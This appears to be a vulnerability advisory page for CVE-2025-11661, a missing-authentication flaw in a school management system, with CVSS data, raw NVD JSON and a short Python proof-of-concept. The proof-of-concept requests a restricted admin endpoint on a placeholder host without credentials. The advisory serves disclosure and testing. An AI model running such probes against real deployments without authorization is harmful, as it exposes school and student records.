Security Vulnerability Report
CVE-2025-11661 CVSS 7.3 HIGH

CVE-2025-11661

Published: 2025-10-13 05:15:50
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was found in ProjectsAndPrograms School Management System up to commit 6b6fae5426044f89c08d0dd101c7fa71f9042a59. The affected component is not identified. Manipulation results in missing authentication (CWE-306). The attack can be carried out remotely. An exploit has been made public and could be used. The product follows a rolling-release strategy for continuous delivery.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
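CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Note: the raw record below lists this 7.3 vector as the Secondary assessment. Its Primary CVSS 3.1 entry is 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), so triage should take the higher score into account.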

Configurations (Affected Products)

cpe:2.3:a:oranbyte:school_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
ProjectsAndPrograms School Management System < commit 6b6fae5426044f89c08d0dd101c7fa71f9042a59

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
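# CVE-2025-11661 PoC - Missing Authentication in ProjectsAndPrograms School Management System
# Exploit: Access restricted endpoints without authentication
import requests

# Target configuration.
# Both values are placeholders. The advisory describes the affected component
# as "an unknown part", so the path below is only an example and has to be
# replaced with one that is known to require a login on the deployment under test.
TARGET_URL = "http://target-school-mgmt-system.com"
VULNERABLE_ENDPOINT = "/admin/dashboard"  # Example restricted endpoint


def exploit_missing_auth(base_url, endpoint):
    """Request a protected endpoint without credentials and report the outcome.

    CVE-2025-11661 is a missing-authentication weakness (CWE-306): the
    application fails to enforce authentication checks on certain endpoints.

    Args:
        base_url: Scheme and host of the deployment under test.
        endpoint: Path that is expected to require a logged-in session.

    Returns:
        The response body when the server answers HTTP 200, otherwise None
        (redirect, any other status code, or a transport error).

    An HTTP 200 alone is not proof of the flaw: an application may serve its
    login form with status 200. The returned body must be compared with what
    an authenticated session receives.
    """
    target = f"{base_url}{endpoint}"

    # No cookies, tokens or Authorization header are sent.
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Accept": "application/json, text/html",
    }

    try:
        # Redirects are not followed, so a bounce to a login page stays
        # visible as a 302 instead of being reported as a 200.
        response = requests.get(
            target, headers=headers, timeout=10, allow_redirects=False
        )
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

    if response.status_code == 200:
        print(f"[+] SUCCESS: Accessed {target} without authentication!")
        print(f"[+] Response length: {len(response.text)}")
        print(f"[+] Response preview: {response.text[:500]}")
        return response.text

    if response.status_code == 302:
        print(f"[-] Redirected (possible auth check): {response.headers.get('Location')}")
    else:
        print(f"[-] Status code: {response.status_code}")
    return None


if __name__ == "__main__":
    # Attempt to access restricted endpoint without authentication
    result = exploit_missing_auth(TARGET_URL, VULNERABLE_ENDPOINT)
    # Compare against None rather than truthiness: an empty body returned
    # with HTTP 200 is still an unauthenticated 200 and must be reported.
    if result is not None:
        print("\n[!] Possible CVE-2025-11661 exposure: HTTP 200 returned without credentials.")
        print("[!] Compare the body with an authenticated response before treating this as confirmed.")
        # Remediation for CWE-306 is a server-side session check on every
        # restricted handler, not only on the login entry point.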

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11661", "sourceIdentifier": "[email protected]", "published": "2025-10-13T05:15:49.833", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in ProjectsAndPrograms School Management System up to 6b6fae5426044f89c08d0dd101c7fa71f9042a59. This affects an unknown part. Performing manipulation results in missing authentication. The attack is possible to be carried out remotely. The exploit has been made public and could be used. This product adopts a rolling release strategy to maintain continuous delivery"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", 
"Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-306"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": 
[{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oranbyte:school_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "8F87971A-DCBD-45DE-AAD5-1C55D4E81268"}]}]}], "references": [{"url": "https://github.com/qqy-123/cve/issues/6", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.328078", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.328078", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.665611", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}